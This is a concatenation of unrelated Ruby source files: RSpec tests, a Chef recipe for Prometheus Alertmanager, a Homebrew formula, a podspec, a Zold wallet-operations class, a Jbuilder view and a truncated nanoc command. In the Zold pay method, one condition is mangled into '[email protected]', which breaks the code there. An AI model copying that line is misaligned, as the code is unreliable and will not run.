        .with(uri, params).and_call_original
      is_expected.to eq(response)
    }
  end
  context 'with an error response' do
    include_examples 'rising a hash error'
  end
end
RSpec.describe MSIDP::Endpoint, '#token' do
  include_context 'Net::HTTP mock'
  include_context 'token uri'
  let(:scope) { 'https://example.com/scope' }
  subject { Test.token(uri, { scope: scope }) }
  context 'with a success response' do
    include_context 'token response'
    # #token should delegate to #post and wrap the JSON payload in an
    # AccessToken whose expiry is the response Date plus expires_in.
    it {
      expect(Test).to receive(:post)
        .with(uri, { scope: scope }).and_call_original
      is_expected.to be_instance_of(MSIDP::AccessToken)
        .and have_attributes(
          value: token, scope: [scope], expire: date + expires_in
        )
    }
  end
  context 'with an error response' do
    include_examples 'rising a hash error'
  end
  context 'with an invalid response' do
    include_examples 'rising a text error'
  end
end
ff5cbb9262a8ea5c8972f4dae2236bdd9e469333 | 378 | module Spree
module Inventory
module UploadFileActionDecorator
def upload_options
@upload_options ||= { vendor_id: upload_meta.delete(:vendor_id) }
end
def queue_name
slug = Spree::Vendor.find(upload_options[:vendor_id]).slug
"#{slug}-uploads"
end
end
UploadFileAction.prepend(UploadFileActionDecorator)
end
end
| 22.235294 | 73 | 0.677249 |
339d62766a963f20c10281babbea6a388b7112f9 | 232 | module Gitlab
module Git
class Railtie < Rails::Railtie
initializer 'gitlab_git.add_middleware' do |app|
app.config.middleware.insert_before "Rack::Runtime", "Gitlab::Git::Middleware"
end
end
end
end
| 23.2 | 86 | 0.685345 |
0861e54e8e41308a4b6f20e0b3e38fbb75a0ab95 | 279 | require './config/environment'
if ActiveRecord::Base.connection.migration_context.needs_migration?
raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end
use Rack::MethodOverride
use UsersController
use PupdatesController
run ApplicationController
| 21.461538 | 77 | 0.820789 |
110314c12c9744edecf9f97c8bec72b4817deae8 | 115 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "ruby_wifi_scanner"
require "minitest/autorun"
| 23 | 58 | 0.765217 |
26dee9ca4f6b6992a2567fac63019e6dc43d572a | 1,340 | class DockerFileBuilder
def write_persistent_files
unless @blueprint_reader.persistent_files.nil?
write_comment("#Persistant Files #{@blueprint_reader.persistent_files}")
log_build_output('set setup_env')
paths = ''
src_paths = @blueprint_reader.persistent_files
unless src_paths.nil?
src_paths.each do |p_file|
# p_file[:volume_name] = templater.process_templated_string(p_file[:volume_name])
path = p_file[:path]
dir = File.dirname(path)
file = File.basename(path)
SystemDebug.debug(SystemDebug.builder, :dir, dir)
if dir.is_a?(String) == false || dir.length == 0 || dir == '.' || dir == '..'
path = "app/#{file}"
end
paths += "#{p_file[:volume_name]}:#{path} "
end
write_build_script("persistent_files.sh #{paths}")
end
end
end
def write_persistent_dirs
unless @blueprint_reader.persistent_dirs.nil?
log_build_output('setup persistent Dirs')
paths = ''
write_comment('#Persistant Dirs')
@blueprint_reader.persistent_dirs.each do |p_dir|
path = p_dir[:path]
path.chomp!('/')
paths += "#{p_dir[:volume_name]}:#{path} " unless path.nil?
end
write_build_script("persistent_dirs.sh #{paths}")
end
end
end | 35.263158 | 91 | 0.622388 |
6ad51a745704c68803d0e24bf5fa469a6601e446 | 1,062 | # -*- encoding : utf-8 -*-
require 'spec_helper'
describe 'apt::force', :type => :define do
let :title do
'my_package'
end
let :default_params do
{
:release => 'testing',
:version => false
}
end
[{},
{
:release => 'stable',
:version => '1'
}
].each do |param_set|
describe "when #{param_set == {} ? "using default" : "specifying"} define parameters" do
let :param_hash do
default_params.merge(param_set)
end
let :params do
param_set
end
let :unless_query do
base_command = "/usr/bin/dpkg -s #{title} | grep -q "
base_command + (params[:version] ? "'Version: #{params[:version]}'" : "'Status: install'")
end
let :exec_title do
base_exec = "/usr/bin/apt-get -y -t #{param_hash[:release]} install #{title}"
base_exec + (params[:version] ? "=#{params[:version]}" : "")
end
it { should contain_exec(exec_title).with_unless(unless_query) }
end
end
end
| 24.136364 | 99 | 0.539548 |
4a4d5adad2ede3565b763e3ab7fad0d606885b4e | 1,020 | class Rem < Formula
desc "Command-line tool to access OSX Reminders.app database"
homepage "https://github.com/kykim/rem"
url "https://github.com/kykim/rem/archive/20150618.tar.gz"
sha256 "e57173a26d2071692d72f3374e36444ad0b294c1284e3b28706ff3dbe38ce8af"
bottle do
cellar :any_skip_relocation
sha256 "326f7a21f696b7614a55a5edeb57e08482ff7b4c72506bcecff5deaa0552828e" => :sierra
sha256 "c9892df4f6aa5d58097e4cc4d62388ccbb1e0c02604b1139cfe829d47d992442" => :el_capitan
sha256 "d9a6303ff3935923ba53d093e95387caaf24460a4cd7fb7d330fa5c3988b551c" => :yosemite
sha256 "bf65e89ec4ca486b95f04c1c737627b2e0091af8a5c137795e521b96664d75e2" => :mavericks
sha256 "3c858e09bce1941b84ca3e5d77163cac4e3b7efcd6a1afcc72354a450c8ee495" => :mountain_lion
end
depends_on :xcode => :build
conflicts_with "remind", :because => "both install `rem` binaries"
def install
xcodebuild "SYMROOT=build"
bin.install "build/Release/rem"
end
test do
system "#{bin}/rem", "version"
end
end
| 35.172414 | 95 | 0.786275 |
1ae94ac54f8cc050c98b52bcbd268858eab54ba6 | 1,561 |
Pod::Spec.new do |s|
s.name = "NBUCore"
s.version = "1.9.1"
s.summary = "Convenience extensions and utilities for iOS projects."
s.homepage = "http://cyberagent.github.io/iOS-NBUCore/"
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.author = { "CyberAgent Inc." => "", "Ernesto Rivera" => "[email protected]" }
s.screenshots = [ "https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard.png",
"https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard_minimized.png",
"https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard_filter.png" ]
s.source = { :git => "https://github.com/CyberAgent/iOS-NBUCore.git", :tag => "#{s.version}" }
s.platform = :ios
s.source_files = 'Source/*.{h,m}'
s.framework = 'Security'
s.requires_arc = true
s.preserve_paths = "README.*", "NOTICE", "*.xcconfig"
s.dependency 'Lockbox', '~> 1.4.2'
s.dependency 'CocoaLumberjack', '<= 1.6'
s.subspec 'UI' do |su|
su.source_files = 'Source/UI/*.{h,m}'
end
s.subspec 'Helpers' do |sh|
sh.source_files = 'Source/Helpers/*.{h,m}'
end
s.subspec 'Additions' do |sa|
sa.source_files = 'Source/Additions/*.{h,m}'
end
s.subspec 'Dashboard' do |sd|
sd.source_files = 'Source/Dashboard/*.{h,m}'
sd.resources = 'Source/Dashboard/*.{xib}'
end
end
| 38.073171 | 108 | 0.568866 |
ff924732a6bc719520b0763a26de120b42e41911 | 119 | module SavedSearchTestHelper
def mock_saved_search_service!
SavedSearch.stubs(:enabled?).returns(true)
end
end
| 19.833333 | 46 | 0.798319 |
ab2f199c6c0aba99cc5009a54882aa96121a3f9c | 2,724 | #
# Cookbook Name:: prometheus
# Recipe:: alertmanager
#
# Author: Paul Magrath <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Chef recipe: install the Prometheus Alertmanager from source and run it
# under Upstart. All tunables come from node['prometheus'] attributes:
# user/group, install dir, log dir, and the alertmanager git repo/revision
# plus config-template settings.

# Compiler toolchain is needed to build alertmanager from source (see the
# bash 'compile_alertmanager_source' resource below).
include_recipe 'build-essential::default'

# Create a dedicated, non-login system user for the service, unless the node
# opts into reusing an existing user or the service is configured to run as root.
user node['prometheus']['user'] do
  system true
  shell '/bin/false' # no interactive login for the service account
  home node['prometheus']['dir']
  not_if { node['prometheus']['use_existing_user'] == true || node['prometheus']['user'] == 'root' }
end

# Installation directory that will hold the compiled alertmanager binary.
directory node['prometheus']['dir'] do
  owner node['prometheus']['user']
  group node['prometheus']['group']
  mode '0755'
  recursive true
end

# Log directory for the service.
directory node['prometheus']['log_dir'] do
  owner node['prometheus']['user']
  group node['prometheus']['group']
  mode '0755'
  recursive true
end

# -- Write our Config -- #
# Render the alertmanager configuration; any change restarts the service.
template node['prometheus']['alertmanager']['config.file'] do
  cookbook node['prometheus']['alertmanager']['config_cookbook_name']
  source node['prometheus']['alertmanager']['config_template_name']
  mode 0644
  owner node['prometheus']['user']
  group node['prometheus']['group']
  variables(
    notification_config: node['prometheus']['alertmanager']['notification']
  )
  notifies :restart, 'service[alertmanager]'
end

# -- Do the install -- #
# These packages are needed go build
%w( curl git-core mercurial gzip sed ).each do |pkg|
  package pkg
end

# Fetch the alertmanager sources at the pinned revision into the Chef cache.
git "#{Chef::Config[:file_cache_path]}/alertmanager-#{node['prometheus']['alertmanager']['version']}" do
  repository node['prometheus']['alertmanager']['git_repository']
  revision node['prometheus']['alertmanager']['git_revision']
  action :checkout
end

# Build the binary and move it into the install dir.
# NOTE(review): this resource has no creates/not_if guard, so it recompiles
# (and restarts the service) on every Chef run — confirm that is intended.
bash 'compile_alertmanager_source' do
  cwd "#{Chef::Config[:file_cache_path]}/alertmanager-#{node['prometheus']['alertmanager']['version']}"
  code "make && mv alertmanager #{node['prometheus']['dir']}"
  notifies :restart, 'service[alertmanager]'
end

# Upstart job definition for the service.
template '/etc/init/alertmanager.conf' do
  source 'upstart/alertmanager.service.erb'
  mode 0644
  notifies :restart, 'service[alertmanager]', :delayed
end

# Enable and start the service via the Upstart provider.
service 'alertmanager' do
  provider Chef::Provider::Service::Upstart
  action [:enable, :start]
end

# rubocop:disable Style/HashSyntax
# Declare which service actions the Upstart job supports.
service 'alertmanager' do
  supports :status => true, :restart => true
end
# rubocop:enable Style/HashSyntax
| 28.978723 | 104 | 0.716593 |
e26d582805c3600f36bb72c4c6b5276a87626907 | 2,793 | # frozen_string_literal: true
require "spec_helper"

# Specs for GraphQL::Relay::ConnectionInstrumentation, which rewrites
# `connection` fields at schema build time: the schema's copy gains the Relay
# pagination arguments and a connection-aware resolver, while the field
# definition the user wrote is left untouched.
describe GraphQL::Relay::ConnectionInstrumentation do
  it "replaces the previous field definition" do
    test_type = GraphQL::ObjectType.define do
      name "Test"
      connection :tests, test_type.connection_type
    end

    assert_equal ["tests"], test_type.fields.keys
  end

  it "keeps a reference to the function" do
    conn_field = StarWars::Faction.graphql_definition.fields["shipsWithMaxPageSize"]
    assert_instance_of StarWars::ShipsWithMaxPageSize, conn_field.function
  end

  # Builds a one-field schema and returns both the raw field definition and
  # the finished schema, so specs can compare the field before and after
  # instrumentation.
  let(:build_schema) {
    test_type = nil

    test_field = GraphQL::Field.define do
      type(test_type.connection_type)
      property(:something)
    end

    test_type = GraphQL::ObjectType.define do
      name "Test"
      connection :tests, test_field
    end

    [
      test_field,
      GraphQL::Schema.define(query: test_type, raise_definition_error: true)
    ]
  }

  it "leaves the original field untouched" do
    test_field, test_schema = build_schema
    conn_field = test_schema.get_field(test_schema.query, "tests")

    # Instrumentation adds the four Relay pagination arguments
    # (first/last/before/after) to the schema's copy only.
    assert_equal 0, test_field.arguments.length
    assert_equal 4, conn_field.arguments.length
    assert_instance_of GraphQL::Field::Resolve::MethodResolve, test_field.resolve_proc
    assert_instance_of GraphQL::Relay::ConnectionResolve, conn_field.resolve_proc
  end

  it "passes connection behaviors to redefinitions" do
    _test_field, test_schema = build_schema
    connection_field = test_schema.get_field(test_schema.query, "tests")
    redefined_connection_field = connection_field.redefine { argument "name", types.String }

    # The redefined copy keeps the pagination arguments plus the new one,
    # and both copies keep the connection resolver.
    assert_equal 4, connection_field.arguments.size
    assert_equal 5, redefined_connection_field.arguments.size

    assert_instance_of GraphQL::Relay::ConnectionResolve, connection_field.resolve_proc
    assert_instance_of GraphQL::Relay::ConnectionResolve, redefined_connection_field.resolve_proc
  end

  describe "after_built_ins instrumentation" do
    it "has access to connection objects" do
      query_str = <<-GRAPHQL
      {
        rebels {
          ships {
            pageInfo {
              __typename
            }
          }
        }
      }
      GRAPHQL

      ctx = { before_built_ins: [], after_built_ins: [] }
      star_wars_query(query_str, {}, context: ctx)
      # The second item is different here:
      # Before the object is wrapped in a connection, the instrumentation sees `Array`
      assert_equal ["StarWars::FactionRecord", "Array", "GraphQL::Relay::ArrayConnection"], ctx[:before_built_ins]
      # After the object is wrapped in a connection, it sees the connection object
      assert_equal ["StarWars::Faction", "GraphQL::Relay::ArrayConnection", "GraphQL::Relay::ArrayConnection"], ctx[:after_built_ins]
    end
  end
end
| 33.25 | 133 | 0.717508 |
1db4a66b780d0a17f5fb02a2521f46615a670589 | 2,045 | require File.expand_path(File.join(File.dirname(__FILE__), '..', "helper"))
module SWF
  # Tests for SWF::Button: block-style construction, attaching shapes as
  # characters for the hit/up/over/down states, wiring actions to mouse
  # events, and applying placement transforms to the returned records.
  class TestButton < Kedama::TestCase
    # Button.new must yield the freshly created button to the given block.
    def test_new_yields
      called = false
      Button.new { |button|
        assert button
        called = true
      }
      assert called
    end

    # Two-frame movie: a circle-shaped button on frame 1 jumps to frame 2 on
    # mouse-up; a replacement button on frame 2 jumps back on mouse-down.
    def test_button
      Movie.new { |movie|
        di = nil
        shape = Shape.new { |s|
          s.line = [2, 255, 0, 0, 255]
          s.right_fill = s.solid_fill(255, 0, 0, 255)
          s.draw_circle(20)
        }
        movie.frame { |frame|
          di = frame << Button.new { |button|
            button.add_character(shape,
              Button::HIT|Button::UP|Button::DOWN|Button::OVER)
            button.add_action(Action.new('_root.gotoAndStop(2);'),Button::MOUSEUP)
          }
          frame << Action.new('_root.stop();')
          di.move_to(100, 100)
        }
        movie.frame { |frame|
          di.remove
          di = frame << Button.new { |button|
            button.add_character(shape,
              Button::HIT|Button::UP|Button::DOWN|Button::OVER)
            button.add_action(Action.new('_root.gotoAndStop(1);'),Button::MOUSEDOWN)
          }
          di.move_to(50, 100)
        }
      }
    end

    # Reuses one shape for several button states, each rotated and shifted —
    # checks that add_character returns a record supporting rotate/move.
    def test_rotate_and_move
      Movie.new { |movie|
        shape = Shape.new { |s|
          s.line = [1, 255, 0, 0, 255]
          s.right_fill = s.solid_fill(255, 255, 0, 255)
          s.draw_line(100, 0)
          s.draw_line(0, 40)
          s.draw_line(0, 0)
        }
        movie.frame { |frame|
          frame.add(Button.new { |button|
            button.add_character(
              shape,
              Button::HIT|Button::UP|Button::OVER|Button::DOWN
            )
            button.add_character(
              shape,
              Button::OVER|Button::DOWN
            ).rotate(10).move(20, 0)
            button.add_character(
              shape,
              Button::DOWN
            ).rotate(20).move(40, 0)
          }).move_to(50, 100)
        }
      }
    end
  end
end
| 26.907895 | 84 | 0.494866 |
ed637e7b04d6b74d0c7a0f7eb73be58dca067473 | 276 | require 'ipconverter/version'
require 'ipconverter/ipconverter'
# Contains the methods for doing IP Address conversions
#
# Example:
# IpConverter.str_to_int('192.168.2.1') # 3232236033
#
# Namespace for the IP-address conversion helpers implemented in the
# native extension (required above as ipconverter/ipconverter). Both
# helpers are exposed as module-level functions.
module IpConverter
  # Expose both conversion helpers in a single declaration.
  module_function :str_to_int, :int_to_str
end
| 21.230769 | 56 | 0.782609 |
e20ea336cb447ee6f6479c67192f2707a65df800 | 298 | class RoyalTsx < Cask
  # Download artifact and update feed for the Royal TSX 1.3.0.0 release.
  url 'http://app.royaltsx.com/updates/royaltsx_1.3.0.0.dmg'
  appcast 'http://app.royaltsx.com/updates_stable.php'
  homepage 'http://www.royaltsx.com'
  version '1.3.0.0'
  # SHA-256 checksum of the dmg above.
  sha256 '2306ae0579b097ccf4796f9cc08012819d3e55d5025a1424c8eca5330cdaedf5'
  # App bundle to link into the Applications folder.
  link 'Royal TSX.app'
end
| 33.111111 | 75 | 0.765101 |
333558d69d11a33a76ff5bb7ea596adf111e1902 | 2,731 | ###
# Do not use this file to override the ruby cookbook's default
# attributes. Instead, please use the customize.rb attributes file,
# which will keep your adjustments separate from the AWS OpsWorks
# codebase and make it easier to upgrade.
#
# However, you should not edit customize.rb directly. Instead, create
# "ruby/attributes/customize.rb" in your cookbook repository and
# put the overrides in YOUR customize.rb file.
#
# Do NOT create an 'ruby/attributes/ruby.rb' in your cookbooks. Doing so
# would completely override this file and might cause upgrade issues.
#
# See also: http://docs.aws.amazon.com/opsworks/latest/userguide/customizing.html
###
include_attribute 'opsworks_initial_setup::default'
include_attribute 'opsworks_commons::default'

# Translate the Ruby series selected in OpsWorks
# (node["opsworks"]["ruby_version"]) into the concrete version attributes
# consumed by the packaging recipes. Unrecognized series fall through to
# empty strings.
case node["opsworks"]["ruby_version"]
when "2.2"
  default[:ruby][:major_version] = '2'
  default[:ruby][:minor_version] = '2'
  default[:ruby][:patch_version] = '4'
  default[:ruby][:pkgrelease] = '1'
  default[:ruby][:full_version] = [node[:ruby][:major_version], node[:ruby][:minor_version]].join(".")
  default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join(".")
when "2.1"
  default[:ruby][:major_version] = '2'
  default[:ruby][:minor_version] = '1'
  default[:ruby][:patch_version] = '8'
  default[:ruby][:pkgrelease] = '1'
  default[:ruby][:full_version] = [node[:ruby][:major_version], node[:ruby][:minor_version]].join(".")
  default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join(".")
when "2.0.0"
  default[:ruby][:major_version] = '2'
  default[:ruby][:minor_version] = '0'
  default[:ruby][:patch] = 'p648' # this attribute will disappear in favor of the semantic versioning schema
  default[:ruby][:patch_version] = node[:ruby][:patch]
  default[:ruby][:pkgrelease] = '1'
  default[:ruby][:full_version] = '2.0.0'
  # Note: 1.9/2.0 releases join with "-" (e.g. "2.0.0-p648"), not ".".
  default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join("-")
when "1.9.3"
  default[:ruby][:major_version] = '1'
  default[:ruby][:minor_version] = '9'
  default[:ruby][:patch] = 'p551' # this attribute will disappear in favor of the semantic versioning schema
  default[:ruby][:patch_version] = node[:ruby][:patch]
  default[:ruby][:pkgrelease] = '1'
  default[:ruby][:full_version] = '1.9.3'
  default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join("-")
else
  # Unknown or unset series: leave every attribute blank.
  default[:ruby][:major_version] = ''
  default[:ruby][:full_version] = ''
  default[:ruby][:patch_version] = ''
  default[:ruby][:patch] = '' # this attribute will disappear in favor of the semantic versioning schema
  default[:ruby][:pkgrelease] = ''
  default[:ruby][:version] = ''
end

include_attribute "ruby::customize"
| 39.57971 | 108 | 0.691688 |
7a988b7828d20471d3e62400768ff31c3036b025 | 4,410 | # Copyright (c) 2018 Yegor Bugayenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'tempfile'
require 'openssl'
require 'zold/log'
#
# Operations with a user.
#
# Wallet operations performed on behalf of a single user: pulling and
# pushing the user's wallet over the Zold network, and making payments.
# This is a thin orchestration layer over the Zold command classes
# (Zold::Pull, Zold::Push, Zold::Pay, Zold::Propagate).
class Ops
  # item:    persistence record holding the user's wallet id and key
  # user:    the owning user object
  # wallets/remotes/copies: Zold storage collaborators
  # log:     Zold logger (quiet by default)
  # network: Zold network name ('test' by default)
  # Every collaborator is validated eagerly so a misconfigured caller fails
  # fast instead of deep inside a Zold command.
  def initialize(item, user, wallets, remotes, copies, log: Zold::Log::Quiet.new, network: 'test')
    raise 'User can\'t be nil' if user.nil?
    @user = user
    raise 'Item can\'t be nil' if item.nil?
    @item = item
    raise 'Wallets can\'t be nil' if wallets.nil?
    @wallets = wallets
    raise 'Remotes can\'t be nil' if remotes.nil?
    @remotes = remotes
    raise 'Copies can\'t be nil' if copies.nil?
    @copies = copies
    raise 'Log can\'t be nil' if log.nil?
    @log = log
    raise 'Network can\'t be nil' if network.nil?
    @network = network
  end

  # Fetch the user's wallet from remote nodes into local storage and log
  # the resulting balance.
  def pull
    start = Time.now
    id = @item.id
    require 'zold/commands/pull'
    Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
      ['pull', id.to_s, "--network=#{@network}"]
    )
    wallet = @wallets.find(id)
    @log.info("#{Time.now.utc.iso8601}: Wallet #{wallet.id} pulled successfully \
in #{(Time.now - start).round}s, the balance is #{wallet.balance}\n \n ")
  end

  # Publish the user's wallet to remote nodes and log the result.
  def push
    start = Time.now
    wallet = @user.wallet
    require 'zold/commands/push'
    Zold::Push.new(wallets: @wallets, remotes: @remotes, log: @log).run(
      ['push', wallet.id.to_s, "--network=#{@network}"]
    )
    @log.info("#{Time.now.utc.iso8601}: Wallet #{wallet.id} pushed successfully \
in #{(Time.now - start).round}s, the balance is #{wallet.balance}\n \n ")
  end

  # Transfer +amount+ (a Zold::Amount) from the user's wallet to +bnf+
  # (a Zold::Id or invoice string), signing with the private key
  # reassembled from +keygap+. Pulls any missing wallets first, then pays,
  # propagates, and pushes the result.
  def pay(keygap, bnf, amount, details)
    raise 'Keygap can\'t be nil' if keygap.nil?
    raise 'Beneficiary can\'t be nil' if bnf.nil?
    raise 'Amount can\'t be nil' if amount.nil?
    raise 'Payment amount can\'t be zero' if amount.zero?
    raise 'Payment amount can\'t be negative' if amount.negative?
    raise 'Amount must be of type Amount' unless amount.is_a?(Zold::Amount)
    raise 'Details can\'t be nil' if details.nil?
    raise 'The user is not registered yet' unless @item.exists?
    raise 'The account is not confirmed yet' unless @user.confirmed?
    start = Time.now
    # Make sure the payer's wallet is present locally before paying.
    unless @wallets.find(@user.item.id).exists?
      require 'zold/commands/pull'
      Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
        ['pull', @user.item.id.to_s, "--network=#{@network}"]
      )
    end
    # When paying to a wallet id, pull the beneficiary's wallet too if it is
    # not yet local. (Restored from a corrupted dump artifact:
    # "[email protected]" was an obfuscation of "!@wallets.find".)
    if bnf.is_a?(Zold::Id) && !@wallets.find(bnf).exists?
      require 'zold/commands/pull'
      Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
        ['pull', bnf.to_s, "--network=#{@network}"]
      )
    end
    w = @user.wallet
    # The reassembled private key only ever touches a temporary file, which
    # Tempfile removes when the block exits.
    Tempfile.open do |f|
      File.write(f, @item.key(keygap))
      require 'zold/commands/pay'
      Zold::Pay.new(wallets: @wallets, remotes: @remotes, log: @log).run(
        ['pay', '--private-key=' + f.path, w.id.to_s, bnf.to_s, amount.to_zld(8), details, '--force']
      )
    end
    require 'zold/commands/propagate'
    Zold::Propagate.new(wallets: @wallets, log: @log).run(['propagate', w.id.to_s])
    require 'zold/commands/push'
    Zold::Push.new(wallets: @wallets, remotes: @remotes, log: @log).run(
      ['push', w.id.to_s, "--network=#{@network}"]
    )
    @log.info("#{Time.now.utc.iso8601}: Paid #{amount} from #{w.id} to #{bnf} \
in #{(Time.now - start).round}s: #{details}\n \n ")
  end
end
| 40.090909 | 101 | 0.663492 |
180233a51ffbd748f9871b9d9a307284e4ea2aea | 3,731 | # frozen_string_literal: true
# Jbuilder view: serializes one course, with extra fields that depend on the
# requesting user's role (visitor / student / non-student / instructor).
json.course do
  # Role of the current user in this course; VISITOR_ROLE when logged out.
  user_role = current_user&.role(@course) || CoursesUsers::Roles::VISITOR_ROLE

  # Direct attribute passthroughs from the Course record.
  json.call(@course, :id, :title, :description, :start, :end, :school,
            :subject, :slug, :url, :submitted, :expected_students, :timeline_start,
            :timeline_end, :day_exceptions, :weekdays, :no_day_exceptions,
            :updated_at, :string_prefix, :use_start_and_end_times, :type,
            :home_wiki, :character_sum, :upload_count, :uploads_in_use_count,
            :upload_usages_count, :cloned_status, :flags, :level, :format, :private,
            :closed?, :training_library_slug, :peer_review_count, :needs_update,
            :update_until, :withdrawn)

  json.wikis @course.wikis, :language, :project
  json.timeline_enabled @course.timeline_enabled?
  json.academic_system @course.academic_system
  json.home_wiki_bytes_per_word @course.home_wiki.bytes_per_word
  json.home_wiki_edits_enabled @course.home_wiki.edits_enabled?
  json.wiki_edits_enabled @course.wiki_edits_enabled?
  json.assignment_edits_enabled @course.assignment_edits_enabled?
  json.wiki_course_page_enabled @course.wiki_course_page_enabled?
  json.enrollment_edits_enabled @course.enrollment_edits_enabled?
  json.account_requests_enabled @course.account_requests_enabled?
  json.online_volunteers_enabled @course.online_volunteers_enabled?
  json.stay_in_sandbox @course.stay_in_sandbox?
  # Freshly cloned courses (cloned_status == 1) present a blank term.
  json.term @course.cloned_status == 1 ? '' : @course.term
  json.legacy @course.legacy?
  json.ended @course.end < Time.zone.now
  json.published CampaignsCourses.exists?(course_id: @course.id)
  json.closed @course.closed?
  json.enroll_url "#{request.base_url}#{course_slug_path(@course.slug)}/enroll/"
  json.wiki_string_prefix @course.home_wiki.string_prefix

  # Human-readable activity statistics.
  json.created_count number_to_human @course.new_article_count
  json.edited_count number_to_human @course.article_count
  json.edit_count number_to_human @course.revision_count
  json.student_count @course.user_count
  json.trained_count @course.trained_count
  json.word_count number_to_human @course.word_count
  json.references_count number_to_human @course.references_count
  json.view_count number_to_human @course.view_sum
  json.character_sum_human number_to_human @course.character_sum
  json.syllabus @course.syllabus.url if @course.syllabus.file?
  json.updates average_delay: @course.flags['average_update_delay'],
               last_update: @course.flags['update_logs']&.values&.last

  if user_role.zero? # student role
    json.incomplete_assigned_modules @course.training_progress_manager
                                            .incomplete_assigned_modules(current_user)
  end

  if user_role >= 0 # user enrolled in course
    # Active survey notifications belonging to this course only.
    json.survey_notifications(current_user.survey_notifications.active) do |notification|
      if notification.course.id == @course.id
        json.id notification.id
        json.survey_url course_survey_url(notification).to_s
        json.message notification.survey_assignment.custom_banner_message
      end
    end
  end

  if user_role.positive? # non-student role
    json.passcode_required @course.passcode_required?
    json.passcode @course.passcode
    json.canUploadSyllabus true
    json.requestedAccounts @course.requested_accounts.count if @course.account_requests_enabled?
  elsif @course.passcode
    # If there is a passcode, send a placeholder value. If not, send empty string.
    json.passcode @course.passcode.blank? ? '' : '****'
    json.canUploadSyllabus false
  end

  if user_role == 1 # instructor
    # NOTE(review): local is misspelled ("exeriment_presenter") — harmless,
    # but worth renaming in a behavior-change-free cleanup.
    exeriment_presenter = ExperimentsPresenter.new(@course)
    json.experiment_notification exeriment_presenter.notification if exeriment_presenter.experiment
  end
end
| 47.227848 | 99 | 0.76521 |
1a29c54e3d8ee439621aa360b5575853c8fc8fe5 | 518 | require File.dirname(__FILE__) + '/spec_helper.rb'
FEED = 'http://twitter.com/statuses/user_timeline/3922901.rss'
describe MiniTwitter do
before(:each) do
@twitter = MiniTwitter::Feed.new(FEED)
end
it "should exists" do
@twitter.class.should == MiniTwitter::Feed
end
it "should have items" do
@twitter.items.size.should > 0
@twitter.items.first.class.should == MiniTwitter::Item
@twitter.items.each do |i|
puts "#{i.date} --- #{i.title} --- #{i.url}"
end
end
end | 22.521739 | 62 | 0.650579 |
91e817afb7b7fd98653f20a1db9d1aa5b87ef51d | 2,821 | # encoding: utf-8
module Nanoc3::CLI::Commands

  # Implements the `nanoc3 update` CLI command, which asks each of the
  # site's data sources to migrate its stored data to the format used by the
  # current nanoc version. The operation is destructive, so it requires the
  # -y/--yes flag before doing anything.
  class Update < Cri::Command

    # Command name as typed on the command line.
    def name
      'update'
    end

    # No alternative names for this command.
    def aliases
      []
    end

    # One-line summary shown in command listings.
    def short_desc
      'update the data stored by the data source to a newer version'
    end

    # Full help text shown by `nanoc3 help update`.
    def long_desc
      'Update the data stored by the data source to a newer format. The ' +
      'format in which data is stored can change between releases, and ' +
      'even though backward compatibility is usually preserved, it is ' +
      'often a good idea to store the site data in a newer format so newer ' +
      'features can be taken advantage of.' +
      "\n" +
      'This command will change data, and it is therefore recommended to ' +
      'make a backup in case something goes wrong.'
    end

    # Usage string shown in help output.
    def usage
      "nanoc3 update [options]"
    end

    # Command-line options: --vcs selects a VCS for add/delete/move
    # operations; --yes confirms the destructive migration.
    def option_definitions
      [
        # --vcs
        {
          :long => 'vcs', :short => 'c', :argument => :required,
          :desc => 'select the VCS to use'
        },
        # --yes
        {
          :long => 'yes', :short => 'y', :argument => :forbidden,
          :desc => 'updates the data without warning'
        }
      ]
    end

    # Entry point: validates arguments, requires a nanoc site directory and
    # the -y confirmation, then runs each data source's update.
    def run(options, arguments)
      # Check arguments
      if arguments.size != 0
        $stderr.puts "usage: #{usage}"
        exit 1
      end

      # Make sure we are in a nanoc site directory
      @base.require_site

      # Set VCS if possible
      @base.set_vcs(options[:vcs])

      # Check for -y switch
      unless options.has_key?(:yes)
        $stderr.puts '*************'
        $stderr.puts '** WARNING **'
        $stderr.puts '*************'
        $stderr.puts
        $stderr.puts 'Are you absolutely sure you want to update the ' +
                     'content for this site? Updating the site content ' +
                     'will change the structure of existing data. This ' +
                     'operation is destructive and cannot be reverted. ' +
